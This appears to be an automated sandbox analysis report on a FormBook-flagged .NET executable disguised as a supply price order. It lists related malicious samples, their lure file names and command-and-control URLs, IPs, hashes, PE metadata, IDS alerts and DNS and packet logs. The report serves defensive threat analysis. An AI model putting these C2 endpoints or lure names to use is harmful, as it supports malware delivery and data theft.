                                                                        • www.unitedold.com/h388/?AHrxEXhh=HeOxd3fTK3emeSZhIcEHyZUbH5pi5uzRBKaOyXjbbuHI/gxjF5X3QotEpSoKmdp15nJu&v8kDE=KZtLDXk
                                                                        wLQpoUtFRW.exeGet hashmaliciousBrowse
                                                                        • www.foodboxprogram.com/hisp/?EtJLUP=mPq+goc2WbnDmv4fbddgDYidLsOkPwzb1ZDdyOKSZuYaGeRjfw+Mm+Zx6e1a6ZRBUbvQ&m8=_6Ax3F7HL65px0pP
                                                                        payment details.exeGet hashmaliciousBrowse
                                                                        • www.kumamotors.com/imm8/?m0G0H=WNbJnnYKyXaFNyvqUv7OM8tc6Ip+G1TKO56RrIv1d9VKfxOXYBkfWrW8PXSlo33BkjPg&v0=4h-PAlbPzLHPfRf
                                                                        42yTynkXXH.exeGet hashmaliciousBrowse
                                                                        • www.algoswipe.com/i7dg/?TN9=gjiTTXEh9H_&eFQl7bE=QlwSkxbZadzUeQqQ30CvqyB6rj7s5Q3MCb1zrrX2cqYPaGvNcrPTJxNDLhgxtb/4F9TF
                                                                        rich.exeGet hashmaliciousBrowse
                                                                        • www.localhistory.uk/angp/?aDKd98=Tqni2fLSXG5mIFQutWn33nbGnah9sr0oZ31AuXOcuD6yn/9oT6+GkOZo4u+Wx4yaERuP&3fuH=1bVdAz0HBbVxO
                                                                        Wire-Confirmation.xlsxGet hashmaliciousBrowse
                                                                        • www.mobiessence.com/6mam/?b0D4=KE8gpfUButRuMRaKHV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjCzZMh2LYYHbaIsWTA==&r0DpR=Fvl0dr_Xh
                                                                        purchase order_8019.exeGet hashmaliciousBrowse
                                                                        • www.bkardd.com/qb4a/?TL3D=FrgLUJvHzHA4&V48DtRqP=iuWoEo5fxLAlF0IL2VGkxaRFKkUcGJCzRj1yNytJ9vDbgBTcOBN48hgRcyIJeosCgetp

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        parkingsrv0.dondominio.comPROFORMA-PDA 00GGTBGX00001A.xlsxGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        1SGErShR6f.exeGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        EWVNnyXoRS.exeGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        SALES CONTRACT 914 VIPA ORDER 213581.xlsxGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        CTM_50,000.exeGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        PAYMENT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        RFQ_00701521.exeGet hashmaliciousBrowse
                                                                        • 31.214.178.54
                                                                        IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        Payment_Advice.exeGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        pY5XEdTwX7.exeGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        001207.exeGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        Confectionary and choco.xlsxGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        RFQ.exe.exeGet hashmaliciousBrowse
                                                                        • 37.152.88.54
                                                                        30_outputE565F3F#U202egp.exeGet hashmaliciousBrowse
                                                                        • 37.152.88.55

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        AMAZON-02USZFb3RmLJzoGet hashmaliciousBrowse
                                                                        • 184.76.99.170
                                                                        N1Cyp2N7r0Get hashmaliciousBrowse
                                                                        • 13.244.63.184
                                                                        G3kV1FpdsSGet hashmaliciousBrowse
                                                                        • 52.31.137.232
                                                                        T5BjNBDzJaGet hashmaliciousBrowse
                                                                        • 52.49.157.211
                                                                        DHL EXPRESS TESL#U0130MAT B#U0130LD#U0130R#U0130M#U0130 - AWB 9420174470.PDF.exeGet hashmaliciousBrowse
                                                                        • 75.2.26.18
                                                                        Inquiry Order 26-09-2021.exeGet hashmaliciousBrowse
                                                                        • 75.2.115.196
                                                                        GbjE8AwfrzGet hashmaliciousBrowse
                                                                        • 13.239.133.6
                                                                        TfaQUm3e4YGet hashmaliciousBrowse
                                                                        • 18.133.169.79
                                                                        fmS6YYhBy1Get hashmaliciousBrowse
                                                                        • 18.146.208.84
                                                                        cropy2.exeGet hashmaliciousBrowse
                                                                        • 54.218.102.67
                                                                        83Sb5L88ry.exeGet hashmaliciousBrowse
                                                                        • 18.139.111.104
                                                                        EhB2SUfLy2.exeGet hashmaliciousBrowse
                                                                        • 44.227.65.245
                                                                        McYFrqRcE3.exeGet hashmaliciousBrowse
                                                                        • 18.139.111.104
                                                                        sora.arm7Get hashmaliciousBrowse
                                                                        • 18.180.172.181
                                                                        sora.x86Get hashmaliciousBrowse
                                                                        • 13.220.139.156
                                                                        iMobile.apkGet hashmaliciousBrowse
                                                                        • 18.219.6.85
                                                                        L3Gl0GugHoGet hashmaliciousBrowse
                                                                        • 34.255.251.235
                                                                        7sT7tPtEkpGet hashmaliciousBrowse
                                                                        • 54.171.230.55
                                                                        F0ZMmHZif5Get hashmaliciousBrowse
                                                                        • 65.11.71.47
                                                                        0GmF3xh0B5Get hashmaliciousBrowse
                                                                        • 54.171.230.55
                                                                        LIQUIDWEBUSDHL Shipment WaybillDoc_TransportLabel_3990350970.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • 50.28.78.111
                                                                        DHL NOTIFICATION.exeGet hashmaliciousBrowse
                                                                        • 50.28.78.111
                                                                        A4B51BD72DFFD28AD3841217FFEC9E43D21EE3C6F889B.exeGet hashmaliciousBrowse
                                                                        • 69.16.213.208
                                                                        05BB79760B2D993C39D526717DA95AEC99AD74D8FC23E.exeGet hashmaliciousBrowse
                                                                        • 69.16.213.208
                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                        • 69.16.213.208
                                                                        AA9830B26F9C0DB4C3DA3C04A96199550B57251B56F8C.exeGet hashmaliciousBrowse
                                                                        • 69.16.213.208
                                                                        Pendants.exeGet hashmaliciousBrowse
                                                                        • 50.28.78.111
                                                                        IYtpAQqaaN.exeGet hashmaliciousBrowse
                                                                        • 69.16.213.208
                                                                        ovdfd61Ecc.exeGet hashmaliciousBrowse
                                                                        • 208.75.149.34
                                                                        XMae11M5ygGet hashmaliciousBrowse
                                                                        • 69.167.187.66
                                                                        DHL Airwaybill documents_TransportLabel 3831234006.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        DHL Airwaybill documents_TransportLabel 3831234009.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        DHL Airwaybill documents_TransportLabel 3831234009.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                        • 67.227.167.12
                                                                        DHL Airwaybill documents_TransportLabel 3831234005.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        DHL Airwaybill documents_TransportLabel 3831234005.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        Inquiry.exeGet hashmaliciousBrowse
                                                                        • 50.28.78.111
                                                                        DHL Airwaybill documents_TransportLabel 3831234005.exeGet hashmaliciousBrowse
                                                                        • 67.227.232.54
                                                                        New Order Specifications.exeGet hashmaliciousBrowse
                                                                        • 72.52.178.23

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SUPPLY_PRICE_ORDER_9978484DF.exe.log
                                                                        Process:C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1309
                                                                        Entropy (8bit):5.3528008810928345
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                                        MD5:542338C5A30B02E372089FECDC54D607
                                                                        SHA1:6FAD29FF14686FC847B160E876C1E078333F6DCB
                                                                        SHA-256:6CEA4E70947B962733754346CE49553BE3FB6E1FB3949C29EC22FA9CA4B7E7B6
                                                                        SHA-512:FE4431305A8958C4940EB4AC65723A38DA6057C3D30F789C6EDDEBA8962B62E9C0583254E74740855027CF3AE9315E3001A7EEB54168073ED0D2AB9B1F05503A
                                                                        Malicious:true
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.923939152690002
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:SUPPLY_PRICE_ORDER_9978484DF.exe
                                                                        File size:829440
                                                                        MD5:42346ae289e050d44fe9c0bcfb5e84b0
                                                                        SHA1:8409c01d25748b3665cbaf119293d2c778cae1cd
                                                                        SHA256:ee3ae7c76f41fab122d32494212625226a1784fb209b46b657272f0f3f0158b9
                                                                        SHA512:a43972cd083b1823c7ce93351af0f3e586fefb9375ced7f89191d6511043cf6d9a9b095a77f270a6711c831b43f3ab75c49f76e5cc24b693adb290cb20ab298f
                                                                        SSDEEP:24576:BSIFDUfsyMdK3nu7svcZPknp7tF+Xee8:BSIFD+s3KasUZPap7t
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+[Qa..............0..............,... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:0b19312929316931

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4b2ca6
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x61515B2B [Mon Sep 27 05:48:27 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb2c540x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x194a4.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xb0cac0xb0e00False0.663924469965data6.98098108885IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xb40000x194a40x19600False0.363666102217data5.4272949491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xce0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0xb42200x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                        RT_ICON0xb84480x10828data
                                                                        RT_ICON0xc8c700x25a8data
                                                                        RT_ICON0xcb2180x10a8data
                                                                        RT_ICON0xcc2c00x468GLS_BINARY_LSB_FIRST
                                                                        RT_GROUP_ICON0xcc7280x22data
                                                                        RT_GROUP_ICON0xcc74c0x4cdata
                                                                        RT_VERSION0xcc7980x35cdata
                                                                        RT_MANIFEST0xccaf40x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightCopyright F@Soft
                                                                        Assembly Version1.0.6.2
                                                                        InternalNameUCOMIRunningObjectTab.exe
                                                                        FileVersion1.0.6.0
                                                                        CompanyNameF@Soft
                                                                        LegalTrademarks
                                                                        Comments
                                                                        ProductNameDarwin AW
                                                                        ProductVersion1.0.6.0
                                                                        FileDescriptionDarwin AW
                                                                        OriginalFilenameUCOMIRunningObjectTab.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        09/27/21-17:40:19.654385TCP2031453ET TROJAN FormBook CnC Checkin (GET)4968580192.168.2.752.58.78.16
                                                                        09/27/21-17:40:19.654385TCP2031449ET TROJAN FormBook CnC Checkin (GET)4968580192.168.2.752.58.78.16
                                                                        09/27/21-17:40:19.654385TCP2031412ET TROJAN FormBook CnC Checkin (GET)4968580192.168.2.752.58.78.16
                                                                        09/27/21-17:40:30.021119TCP2031453ET TROJAN FormBook CnC Checkin (GET)4968680192.168.2.723.225.139.107
                                                                        09/27/21-17:40:30.021119TCP2031449ET TROJAN FormBook CnC Checkin (GET)4968680192.168.2.723.225.139.107
                                                                        09/27/21-17:40:30.021119TCP2031412ET TROJAN FormBook CnC Checkin (GET)4968680192.168.2.723.225.139.107
                                                                        09/27/21-17:40:35.347868TCP2031453ET TROJAN FormBook CnC Checkin (GET)4968780192.168.2.764.91.246.51
                                                                        09/27/21-17:40:35.347868TCP2031449ET TROJAN FormBook CnC Checkin (GET)4968780192.168.2.764.91.246.51
                                                                        09/27/21-17:40:35.347868TCP2031412ET TROJAN FormBook CnC Checkin (GET)4968780192.168.2.764.91.246.51
                                                                        09/27/21-17:40:50.892047TCP1201ATTACK-RESPONSES 403 Forbidden804968934.102.136.180192.168.2.7

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 27, 2021 17:40:08.720257998 CEST4968480192.168.2.735.215.165.29
                                                                        Sep 27, 2021 17:40:08.983249903 CEST804968435.215.165.29192.168.2.7
                                                                        Sep 27, 2021 17:40:08.986577034 CEST4968480192.168.2.735.215.165.29
                                                                        Sep 27, 2021 17:40:08.986748934 CEST4968480192.168.2.735.215.165.29
                                                                        Sep 27, 2021 17:40:09.255561113 CEST804968435.215.165.29192.168.2.7
                                                                        Sep 27, 2021 17:40:09.255940914 CEST804968435.215.165.29192.168.2.7
                                                                        Sep 27, 2021 17:40:09.255976915 CEST804968435.215.165.29192.168.2.7
                                                                        Sep 27, 2021 17:40:09.257278919 CEST4968480192.168.2.735.215.165.29
                                                                        Sep 27, 2021 17:40:09.257355928 CEST4968480192.168.2.735.215.165.29
                                                                        Sep 27, 2021 17:40:09.523240089 CEST804968435.215.165.29192.168.2.7
                                                                        Sep 27, 2021 17:40:19.635881901 CEST4968580192.168.2.752.58.78.16
                                                                        Sep 27, 2021 17:40:19.654062033 CEST804968552.58.78.16192.168.2.7
                                                                        Sep 27, 2021 17:40:19.654206991 CEST4968580192.168.2.752.58.78.16
                                                                        Sep 27, 2021 17:40:19.654385090 CEST4968580192.168.2.752.58.78.16
                                                                        Sep 27, 2021 17:40:19.672354937 CEST804968552.58.78.16192.168.2.7
                                                                        Sep 27, 2021 17:40:19.672382116 CEST804968552.58.78.16192.168.2.7
                                                                        Sep 27, 2021 17:40:19.672390938 CEST804968552.58.78.16192.168.2.7
                                                                        Sep 27, 2021 17:40:19.672636032 CEST4968580192.168.2.752.58.78.16
                                                                        Sep 27, 2021 17:40:19.672755957 CEST4968580192.168.2.752.58.78.16
                                                                        Sep 27, 2021 17:40:19.690948009 CEST804968552.58.78.16192.168.2.7
                                                                        Sep 27, 2021 17:40:29.863497972 CEST4968680192.168.2.723.225.139.107
                                                                        Sep 27, 2021 17:40:30.020665884 CEST804968623.225.139.107192.168.2.7
                                                                        Sep 27, 2021 17:40:30.020828009 CEST4968680192.168.2.723.225.139.107
                                                                        Sep 27, 2021 17:40:30.021119118 CEST4968680192.168.2.723.225.139.107
                                                                        Sep 27, 2021 17:40:30.179701090 CEST804968623.225.139.107192.168.2.7
                                                                        Sep 27, 2021 17:40:30.179723024 CEST804968623.225.139.107192.168.2.7
                                                                        Sep 27, 2021 17:40:30.180020094 CEST4968680192.168.2.723.225.139.107
                                                                        Sep 27, 2021 17:40:30.180062056 CEST4968680192.168.2.723.225.139.107
                                                                        Sep 27, 2021 17:40:30.337403059 CEST804968623.225.139.107192.168.2.7
                                                                        Sep 27, 2021 17:40:35.225095034 CEST4968780192.168.2.764.91.246.51
                                                                        Sep 27, 2021 17:40:35.347248077 CEST804968764.91.246.51192.168.2.7
                                                                        Sep 27, 2021 17:40:35.347836971 CEST4968780192.168.2.764.91.246.51
                                                                        Sep 27, 2021 17:40:35.347867966 CEST4968780192.168.2.764.91.246.51
                                                                        Sep 27, 2021 17:40:35.472997904 CEST804968764.91.246.51192.168.2.7
                                                                        Sep 27, 2021 17:40:35.473385096 CEST804968764.91.246.51192.168.2.7
                                                                        Sep 27, 2021 17:40:35.473403931 CEST804968764.91.246.51192.168.2.7
                                                                        Sep 27, 2021 17:40:35.473578930 CEST4968780192.168.2.764.91.246.51
                                                                        Sep 27, 2021 17:40:35.473712921 CEST4968780192.168.2.764.91.246.51
                                                                        Sep 27, 2021 17:40:35.595577955 CEST804968764.91.246.51192.168.2.7
                                                                        Sep 27, 2021 17:40:45.592109919 CEST4968880192.168.2.791.195.240.94
                                                                        Sep 27, 2021 17:40:45.616101980 CEST804968891.195.240.94192.168.2.7
                                                                        Sep 27, 2021 17:40:45.616338015 CEST4968880192.168.2.791.195.240.94
                                                                        Sep 27, 2021 17:40:45.616533995 CEST4968880192.168.2.791.195.240.94
                                                                        Sep 27, 2021 17:40:45.639813900 CEST804968891.195.240.94192.168.2.7
                                                                        Sep 27, 2021 17:40:45.647933006 CEST804968891.195.240.94192.168.2.7
                                                                        Sep 27, 2021 17:40:45.648051023 CEST804968891.195.240.94192.168.2.7
                                                                        Sep 27, 2021 17:40:45.648164034 CEST4968880192.168.2.791.195.240.94
                                                                        Sep 27, 2021 17:40:45.648205042 CEST4968880192.168.2.791.195.240.94
                                                                        Sep 27, 2021 17:40:45.671483040 CEST804968891.195.240.94192.168.2.7
                                                                        Sep 27, 2021 17:40:50.699676037 CEST4968980192.168.2.734.102.136.180
                                                                        Sep 27, 2021 17:40:50.712726116 CEST804968934.102.136.180192.168.2.7
                                                                        Sep 27, 2021 17:40:50.713010073 CEST4968980192.168.2.734.102.136.180
                                                                        Sep 27, 2021 17:40:50.713532925 CEST4968980192.168.2.734.102.136.180
                                                                        Sep 27, 2021 17:40:50.726408958 CEST804968934.102.136.180192.168.2.7
                                                                        Sep 27, 2021 17:40:50.892046928 CEST804968934.102.136.180192.168.2.7
                                                                        Sep 27, 2021 17:40:50.892080069 CEST804968934.102.136.180192.168.2.7
                                                                        Sep 27, 2021 17:40:50.892453909 CEST4968980192.168.2.734.102.136.180
                                                                        Sep 27, 2021 17:40:50.892843008 CEST4968980192.168.2.734.102.136.180
                                                                        Sep 27, 2021 17:40:50.905642033 CEST804968934.102.136.180192.168.2.7

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 27, 2021 17:39:00.858103037 CEST6432153192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:39:00.877535105 CEST53643218.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:08.529829979 CEST6195253192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:08.710267067 CEST53619528.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:19.601403952 CEST5621753192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:19.634404898 CEST53562178.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:24.719019890 CEST6335453192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:24.798568010 CEST53633548.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:29.831146002 CEST5312953192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:29.862195015 CEST53531298.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:35.191315889 CEST6245253192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:35.223239899 CEST53624528.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:40.522716999 CEST5782053192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:40.558794975 CEST53578208.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:45.567109108 CEST5084853192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:45.590652943 CEST53508488.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:50.660631895 CEST6124253192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:50.698527098 CEST53612428.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:40:55.907670975 CEST5856253192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:40:55.975321054 CEST53585628.8.8.8192.168.2.7
                                                                        Sep 27, 2021 17:41:01.095741987 CEST5659053192.168.2.78.8.8.8
                                                                        Sep 27, 2021 17:41:01.124341011 CEST53565908.8.8.8192.168.2.7

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Sep 27, 2021 17:40:08.529829979 CEST192.168.2.78.8.8.80xe59Standard query (0)www.gspotworld.comA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:19.601403952 CEST192.168.2.78.8.8.80x675bStandard query (0)www.yota.storeA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:24.719019890 CEST192.168.2.78.8.8.80x4148Standard query (0)www.iamstevekelsey.comA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:29.831146002 CEST192.168.2.78.8.8.80x3762Standard query (0)www.ff4c3dgsp.xyzA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:35.191315889 CEST192.168.2.78.8.8.80x4a83Standard query (0)www.newhollandpurpose.comA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:40.522716999 CEST192.168.2.78.8.8.80xa26fStandard query (0)www.appleluis.hostA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:45.567109108 CEST192.168.2.78.8.8.80x140Standard query (0)www.adronesview.comA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:50.660631895 CEST192.168.2.78.8.8.80x5b9fStandard query (0)www.teelandcompany.comA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:55.907670975 CEST192.168.2.78.8.8.80xabc7Standard query (0)www.baila.madridA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:41:01.095741987 CEST192.168.2.78.8.8.80xdbc4Standard query (0)www.snackithalal.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Sep 27, 2021 17:40:08.710267067 CEST8.8.8.8192.168.2.70xe59No error (0)www.gspotworld.com35.215.165.29A (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:19.634404898 CEST8.8.8.8192.168.2.70x675bNo error (0)www.yota.store52.58.78.16A (IP address)IN (0x0001)
